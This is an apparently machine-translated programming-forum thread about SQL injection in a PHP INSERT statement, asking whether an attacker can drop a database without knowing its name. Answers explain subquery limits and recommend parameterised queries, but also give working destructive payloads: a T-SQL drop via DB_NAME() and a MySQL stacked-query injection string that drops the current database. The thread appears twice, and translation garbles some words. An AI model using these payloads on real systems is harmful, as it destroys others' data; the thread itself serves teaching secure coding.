在 SQL 注入中使用嵌套 SQL 子查询
Using Nested SQL Sub-queries in SQL Injection
这个问题刚刚出现在我的脑海中,无法在任何地方找到它,所以我认为这是最好的提问地点。这仅用于教育目的。我使用了适当的卫生设施并且没有为我的真实数据库提供 DROP 权限。
让我们假设一个具有所有权限的数据库和一个具有三个值的简单插入查询
INSERT INTO test(a,b,c) VALUES('$a','$b','$c');
上述查询易受 sql 注入攻击。
我们假设用户输入是
- a',(select 数据库()),'a')--
- begone2
- begone3
结果查询将是这样的:
INSERT INTO test(a,b,c) VALUES('a',(select DATABASE()),'a')-- ','begone2','begone3')
上面的查询将执行并将数据库名称插入 table 但我的问题是 攻击者是否能够在不知道数据库名称的情况下删除数据库?,查询如下:
INSERT INTO test(a,b,c) VALUES
('a',(DROP DATABASE (select DATABASE())),'a')-- ','begone2','begone3')
我尝试了 运行 上面的查询,但它抛出了一个错误。这个查询有什么问题?
my question is Will a attacker will able to drop the database without actually knowing the database name?
对此的快速回答是是,这就是为什么我们应该使用参数而不是连接字符串,并尽可能避免动态 SQL。
恶意用户可以使用DB_Name()函数获取数据库名称:
SELECT DB_NAME();
下面是一个在不知道她的名字的情况下删除数据库的示例:
DECLARE @SQL NVARCHAR(MAX);
SET @SQL = (SELECT N'USE master;
ALTER DATABASE '+ DB_NAME() +' SET OFFLINE WITH ROLLBACK IMMEDIATE;
DROP DATABASE ' + DB_NAME() + ';');
EXECUTE sp_executesql @SQL;
What's wrong with this query?
INSERT INTO test(a,b,c) VALUES
('a',(DROP DATABASE (select DATABASE())),'a')-- ','begone2','begone3')
这个查询有两个问题。
不能将 DROP DATABASE 放入子查询中。子查询必须是 SELECT 语句并具有结果集(在您显示的示例中,它必须是一列、一行的结果集)。
无论如何,您也不能在子查询中使用 INSERT/UPDATE/DELETE。
DROP DATABASE 不接受子查询的结果作为其参数。语法 DROP DATABASE 接受数据库标识符(名称),您不能 DROP DATABASE ''。子查询的结果始终是数据值(如字符串和数字),而不是标识符。
与此查询比较:
SELECT a, b, c, (SELECT x FROM table2)
FROM table1
子查询 return 是列 x 的值。如果 x 的值是字符串值 'd',这不会导致外部查询 return 标识为 table1.d 的列的值。它 return 是一个文字字符串 'd'。
一般来说,SQL 不允许您使用数据值作为标识符。数据库名称、table 名称和列名称必须明确写入查询 之前 查询被解析。要使标识符动态化,您必须 运行 两个查询,也就是说,您将在创建第二个 SQL 语句时使用第一个查询的结果。
Will a attacker will able to drop the database without actually
knowing the database name?
是的。假设 MySQL,请参阅以下 PHP 代码:
$a = "','',''); SET @sql = CONCAT('DROP DATABASE ', DATABASE()); PREPARE stmt FROM @sql; EXECUTE stmt; -- ";
$b = null;
$c = null;
$sql = "INSERT INTO test(a, b, c) VALUES('$a','$b','$c');";
echo $sql;
它将创建以下 MySQL 语句:
INSERT INTO test(a, b, c) VALUES('','',''); SET @sql = CONCAT('DROP DATABASE ', DATABASE()); PREPARE stmt FROM @sql; EXECUTE stmt; -- ','','');
尝试执行上述 SQL 将删除当前数据库。
这个问题刚刚出现在我的脑海中,无法在任何地方找到它,所以我认为这是最好的提问地点。这仅用于教育目的。我使用了适当的卫生设施并且没有为我的真实数据库提供 DROP 权限。
让我们假设一个具有所有权限的数据库和一个具有三个值的简单插入查询
INSERT INTO test(a,b,c) VALUES('$a','$b','$c');
上述查询易受 sql 注入攻击。
我们假设用户输入是
- a',(select 数据库()),'a')--
- begone2
- begone3
结果查询将是这样的:
INSERT INTO test(a,b,c) VALUES('a',(select DATABASE()),'a')-- ','begone2','begone3')
上面的查询将执行并将数据库名称插入 table 但我的问题是 攻击者是否能够在不知道数据库名称的情况下删除数据库?,查询如下:
INSERT INTO test(a,b,c) VALUES
('a',(DROP DATABASE (select DATABASE())),'a')-- ','begone2','begone3')
我尝试了 运行 上面的查询,但它抛出了一个错误。这个查询有什么问题?
my question is Will a attacker will able to drop the database without actually knowing the database name?
对此的快速回答是是,这就是为什么我们应该使用参数而不是连接字符串,并尽可能避免动态 SQL。
恶意用户可以使用DB_Name()函数获取数据库名称:
SELECT DB_NAME();
下面是一个在不知道她的名字的情况下删除数据库的示例:
DECLARE @SQL NVARCHAR(MAX);
SET @SQL = (SELECT N'USE master;
ALTER DATABASE '+ DB_NAME() +' SET OFFLINE WITH ROLLBACK IMMEDIATE;
DROP DATABASE ' + DB_NAME() + ';');
EXECUTE sp_executesql @SQL;
What's wrong with this query?
INSERT INTO test(a,b,c) VALUES
('a',(DROP DATABASE (select DATABASE())),'a')-- ','begone2','begone3')
这个查询有两个问题。
不能将 DROP DATABASE 放入子查询中。子查询必须是 SELECT 语句并具有结果集(在您显示的示例中,它必须是一列、一行的结果集)。
无论如何,您也不能在子查询中使用 INSERT/UPDATE/DELETE。
DROP DATABASE 不接受子查询的结果作为其参数。语法 DROP DATABASE 接受数据库标识符(名称),您不能 DROP DATABASE ''。子查询的结果始终是数据值(如字符串和数字),而不是标识符。
与此查询比较:
SELECT a, b, c, (SELECT x FROM table2) FROM table1子查询 return 是列
x的值。如果x的值是字符串值 'd',这不会导致外部查询 return 标识为table1.d的列的值。它 return 是一个文字字符串 'd'。
一般来说,SQL 不允许您使用数据值作为标识符。数据库名称、table 名称和列名称必须明确写入查询 之前 查询被解析。要使标识符动态化,您必须 运行 两个查询,也就是说,您将在创建第二个 SQL 语句时使用第一个查询的结果。
Will a attacker will able to drop the database without actually knowing the database name?
是的。假设 MySQL,请参阅以下 PHP 代码:
$a = "','',''); SET @sql = CONCAT('DROP DATABASE ', DATABASE()); PREPARE stmt FROM @sql; EXECUTE stmt; -- ";
$b = null;
$c = null;
$sql = "INSERT INTO test(a, b, c) VALUES('$a','$b','$c');";
echo $sql;
它将创建以下 MySQL 语句:
INSERT INTO test(a, b, c) VALUES('','',''); SET @sql = CONCAT('DROP DATABASE ', DATABASE()); PREPARE stmt FROM @sql; EXECUTE stmt; -- ','','');
尝试执行上述 SQL 将删除当前数据库。